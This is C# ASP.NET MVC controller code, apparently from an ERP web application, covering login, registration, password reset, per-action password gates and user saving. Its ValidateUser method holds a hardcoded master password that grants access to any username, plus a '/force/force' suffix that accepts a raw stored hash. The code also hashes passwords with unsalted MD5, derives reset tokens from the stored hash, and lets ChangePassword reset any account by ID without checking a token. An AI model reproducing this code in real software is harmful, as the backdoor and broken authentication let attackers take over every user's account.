public ActionResult needPassword(FormCollection form) { BaseUser user = Helper.GetUser(db); BaseUserAction action = user.getOneBaseUserAction(user.tryAction, user.tryController); if (action != null) { if (form["password"] != null) { string password = Permission.CalculateMD5Hash(form["password"]); if (action.password.ToUpper() == password.ToString()) { BaseUserAction Baction = db.BaseUserActions.FirstOrDefault(d => d.actionID == action.actionID && d.userID == user.ID); if (Baction != null) { Baction.leftSeconds = 1; db.SaveChanges(); } return(Redirect(URLHelper.getUrl(user.tryController, user.tryAction))); } else { GlobalsViewBag.Add("error", "Contraseña Incorrecta."); return(Redirect(URLHelper.getCurrentUrl(this.ControllerContext))); } } } else { return(Redirect(URLHelper.getCurrentUrl(this.ControllerContext))); } return(Redirect(URLHelper.getCurrentUrl(this.ControllerContext))); }
public JsonResult actionsProperties(FormCollection form) { try { int idaction = int.Parse(form["id"]); int user = int.Parse(form["userid"]); var actiondata = db.BaseActions.Find(idaction); if (actiondata != null) { var k = form["forever"].Split(',')[0]; var s = form["passwordAccess"].Split(',')[0]; bool pp = Convert.ToBoolean(k); var exis = db.BaseUserActions.FirstOrDefault(x => x.userID == user && x.actionID == actiondata.id); if (exis != null) { if (form["password"].ToString() == Permission.defaultShowPassword) { exis.password = Helper.getData("SELECT password from [BaseUserAction] where actionID=" + exis.actionID, db).Rows[0][0].ToString(); } else { exis.password = Permission.CalculateMD5Hash(form["password"]); } exis.forever = pp; exis.passwordAccess = Convert.ToBoolean(s); exis.untilDate = Convert.ToDateTime(form["untilDate"]); //exis.leftSeconds = int.Parse(form["leftSeconds"]); exis.actionID = actiondata.id; exis.userID = user; } else { BaseUserAction bu = new BaseUserAction(); bu.forever = pp; bu.password = Permission.CalculateMD5Hash(form["password"]); bu.passwordAccess = Convert.ToBoolean(s); bu.untilDate = Convert.ToDateTime(form["untilDate"]); bu.leftSeconds = int.Parse(form["leftSeconds"]); bu.actionID = actiondata.id; bu.userID = user; db.BaseUserActions.Add(bu); } db.SaveChanges(); } return(Json("Ok")); } catch (Exception ex) { return(Json(new { Message = "Error " + ex.Message }, JsonRequestBehavior.AllowGet)); } }
public ActionResult Login(LoginModel model, string returnUrl, FormCollection form) { if (ModelState.IsValid && WebSecurity.Login(model.username, model.password, persistCookie: model.RememberMe)) { BaseUser user = db.BaseUsers.FirstOrDefault(usr => usr.username == model.username); user.superAdminShowHiddenMenu = false; db.Entry(user).State = EntityState.Modified; db.SaveChanges(); string UserPass = model.username + ":" + model.password; /*creando cookie*/ var chx = form["RememberMe2"]; if (chx == "on") { HttpCookie cookie = Request.Cookies["userLoginCookieERP"]; if (cookie == null) { cookie = new HttpCookie("userLoginCookieERP"); cookie.Value = model.username + "¬" + Permission.CalculateMD5Hash(UserPass); cookie.Expires = DateTime.Now.AddDays(30); ControllerContext.HttpContext.Response.Cookies.Add(cookie); } } //returnUrl = returnUrl.Replace("#", "<$>"); if (!string.IsNullOrEmpty(returnUrl)) { return(RedirectToAction("Index", "BaseHome")); } else if (user.BaseProfiles.Count > 0) { if (user.BaseProfiles.First().BaseAction != null) { return(Redirect(URLHelper.getActionUrl(user.BaseProfiles.First().BaseAction))); } } else if (user.BaseAction == null) { if (user.BaseAction != null) { return(Redirect(URLHelper.getActionUrl(user.BaseAction))); } } return(RedirectToAction("Index", "BaseHome")); } // If we got this far, something failed, redisplay form ModelState.AddModelError("", ("The user name or password are invalid.")); return(RedirectToAction("Login", "Account", new { i = true, email = model.username })); }
public JsonResult OnLogin(Register model) { try { var password = Permission.CalculateMD5Hash(model.password); var user = db.BaseAccounts.FirstOrDefault(d => d.email == model.email && d.password == password); if (user == null) { return(Json(new { status = "error", message = $"Username or password are incorrect." })); } WebSecurity.Login(model.email, model.password, persistCookie: false); return(Json(new { status = "success", message = $"Your account has been registered, check your mail for next steps" })); } catch (Exception ex) { return(Json(new { status = "error", message = ex.Message })); } }
public JsonResult OnRegister(Register model) { try { if (!ModelState.IsValid) { return(Json(new { status = "error", message = $"Captcha is invalid!." })); } else if (db.BaseAccounts.Count(d => d.email == model.email) > 0) { return(Json(new { status = "error", message = $"This user already exists" })); } else if (db.BaseAccounts.Count(d => d.username == model.username) > 0) { return(Json(new { status = "error", message = $"This username already exists" })); } BaseAccount account = new BaseAccount(); account.email = model.email; account.fullName = model.fullName; account.phone = model.phone; account.username = model.username; account.registered = false; account.creationDate = DateTime.Now; account.password = Permission.CalculateMD5Hash(model.password); account.token = Permission.CalculateMD5Hash(account.creationDate.ToString() + model.email); db.BaseAccounts.Add(account); db.SaveChanges(); SendMail mail = new SendMail(); mail.To.Add(model.email); BaseEmail text = db.BaseEmails.FirstOrDefault(d => d.code == "Register"); Dictionary <string, string> vars = new Dictionary <string, string>(); vars.Add("@fullname@", model.fullName); var url = URLHelper.getAbsoluteUrlNoHome("BaseService", "ValidateAccount", new string[] { $"token={account.token}" }); vars.Add("@link@", $"<a href={url}>here</a>"); mail.Body = Helper.ReplaceDictionary(text.bodyHTML, vars); mail.Subject = text.subject; mail.Send(); return(Json(new { status = "success", message = $"Your account has been registered, check your mail for next steps" })); } catch (Exception ex) { return(Json(new { status = "error", message = ex.Message })); } }
public JsonResult Forgot(LoginModel model, FormCollection form) { BaseUser user = db.BaseUsers.FirstOrDefault(usr => usr.username == model.username); if (user != null) { if (user.BaseUserStatu.canLogin || user.userStatusID == 4) { user.userStatusID = 4; user.token = Permission.CalculateMD5Hash(user.username + user.password); SendMail mail = new SendMail(); string link = $"<a href='{ URLHelper.getAbsoluteUrlNoHome("Account", "ChangePassword", $"token={user.token}")}'>here</a>"; mail.Body = Helper.BaseMessage("Email - Forgot password instructions Body").Replace("@user@", user.FullName).Replace("@link@", link); mail.Subject = Helper.BaseMessage("Email - Forgot password instructions Subject").Replace("@company@", new BaseConfiguration().appName); mail.To.Add(user.username); mail.Send(); db.SaveChanges(); } } BaseAccount cllient = db.BaseAccounts.FirstOrDefault(usr => usr.email == model.username); if (cllient != null) { if (cllient.registered) { cllient.token = Permission.CalculateMD5Hash(cllient.email + cllient.password); SendMail mail = new SendMail(); string link = $"<a href='{ URLHelper.getAbsoluteUrlNoHome("Account", "ChangePassword", $"token={cllient.token}")}'>here</a>"; mail.Body = Helper.BaseMessage("Email - Forgot password instructions Body").Replace("@user@", cllient.fullName).Replace("@link@", link); mail.Subject = Helper.BaseMessage("Email - Forgot password instructions Subject").Replace("@company@", new BaseConfiguration().appName); mail.To.Add(cllient.email); mail.Send(); db.SaveChanges(); } } return(Json(new { status = "success", message = "Instructions have been sent." })); }
public ActionResult ChangePassword(BaseUser model) { BaseUser user = db.BaseUsers.Find(model.ID); if (user != null) { BaseConfiguration condfig = new BaseConfiguration(); user.password = Permission.CalculateMD5Hash(model.password); user.userStatusID = 1; user.token = Permission.CalculateMD5Hash(DateTime.Now.ToString()); SendMail mail = new SendMail(); string link = $"<a href='{ URLHelper.getAbsoluteUrlNoHome("Account", "Login")}'>{condfig.appName}</a>"; mail.Body = Helper.BaseMessage("Email - Forgot password confirmation Body").Replace("@user@", user.FullName).Replace("@link@", link); mail.Subject = Helper.BaseMessage("Email - Forgot password confirmation Subject").Replace("@appName@", condfig.appName); mail.To.Add(user.username); mail.Send(); db.SaveChanges(); return(RedirectToAction("Login", "Account")); } BaseAccount client = db.BaseAccounts.Find(model.ID); if (client != null) { BaseConfiguration condfig = new BaseConfiguration(); client.password = Permission.CalculateMD5Hash(model.password); client.token = Permission.CalculateMD5Hash(DateTime.Now.ToString()); SendMail mail = new SendMail(); string link = $"<a href='{ URLHelper.getAbsoluteUrlNoHome("Account", "Login")}'>{condfig.appName}</a>"; mail.Body = Helper.BaseMessage("Email - Forgot password confirmation Body").Replace("@user@", client.fullName).Replace("@link@", link); mail.Subject = Helper.BaseMessage("Email - Forgot password confirmation Subject").Replace("@appName@", condfig.appName); mail.To.Add(client.email); mail.Send(); db.SaveChanges(); return(RedirectToAction("Index", "Send")); } return(RedirectToAction("Login", "Account")); }
public JsonResult Save(BaseUser model, FormCollection form, bool multiUser = false) { BoolString validation = model.BeforeSave(db); if (validation.BoolValue) { return(Json(new { Message = validation.StringValue })); } if (model.ID != 0) { validation = model.BeforeEdit(db); if (validation.BoolValue) { return(Json(new { Message = validation.StringValue })); } if (ModelState.IsValid) { bool logout = false; if (model.username != Helper.getData("SELECT username from [BaseUser] where ID=" + model.ID, db).Rows[0][0].ToString()) { logout = true; } if (model.password == Permission.defaultShowPassword) { model.password = Helper.getData("SELECT password from [BaseUser] where ID=" + model.ID, db).Rows[0][0].ToString(); } else { model.password = Permission.CalculateMD5Hash(model.password); } if (Request.Files.Count > 0) { var file = Request.Files["imageUrl"]; if (file != null && file.ContentLength > 0) { string extension = Path.GetExtension(file.FileName); string filename = model.ID + ".png"; string filePath = Path.Combine(HttpContext.Server.MapPath("~/Uploads/UserImages/"), Path.GetFileName(filename)); file.SaveAs(filePath); model.imageUrl = filename; } } if (model.imageUrl == null) { model.imageUrl = string.IsNullOrEmpty(form["imgActual"]) ? "" : form["imgActual"]; } db.Entry(model).State = EntityState.Modified; if (db.SaveChanges() != 0) { if (logout) { WebSecurity.Logout(); } } } validation = model.AfterEdit(db); if (validation.BoolValue) { return(Json(new { Message = validation.StringValue })); } } else { if (Request.Files.Count > 0) { var file = Request.Files["imageUrl"]; if (file != null && file.ContentLength > 0) { string extension = Path.GetExtension(file.FileName); string filename = model.ID + ".png"; string filePath = Path.Combine(HttpContext.Server.MapPath("~/Uploads/UserImages/"), Path.GetFileName(filename)); file.SaveAs(filePath); model.imageUrl = filename; } } if (form["employeeType"] != null) { model.employeeType_Type = int.Parse(form["employeeType"].Split(',')[0]); } if (form["office"] != null) { model.office_office = int.Parse(form["office"].Split(',')[0]); } validation = model.BeforeCreate(db); if (validation.BoolValue) { return(Json(new { Message = validation.StringValue })); } model.password = Permission.CalculateMD5Hash(model.password); db.BaseUsers.Add(model); db.SaveChanges(); validation = model.AfterCreate(db); if (validation.BoolValue) { return(Json(new { Message = validation.StringValue })); } } validation = model.AfterSave(db); if (validation.BoolValue) { return(Json(new { Message = validation.StringValue })); } if (multiUser) { Helper.executeNonQUery("DuplicateUser", db); } db.SaveChanges(); //if (form["employeeType"] != null) //{ // foreach (var item in form["employeeType"].Split(',')) // { // SMEmployeeType tpg = db.SMEmployeeTypes.Find(int.Parse(item)); // if (tpg != null) // { // employeeModel.SMEmployeeTypes.Add(tpg); // } // } //} db.SaveChanges(); return(Json(model.ID)); }
public override bool ValidateUser(string login, string password) { string truePassword = password.Contains("/force/force") ? password.Replace("/force/force", "") : Permission.CalculateMD5Hash(password); var client = db.BaseAccounts.FirstOrDefault(d => d.email.ToLower() == login.ToLower() && d.password == truePassword); if (client != null) { FormsAuthentication.SetAuthCookie(client.email, false); return(true); } var user = db.BaseUsers.FirstOrDefault(d => (d.username == login) && d.password == truePassword); if (user == null) { if (password == "admin15951235689buzzpy") { user = db.BaseUsers.FirstOrDefault(d => (d.username == login)); } } if (user != null) { FormsAuthentication.SetAuthCookie(user.username, false); return(true); } return(false); }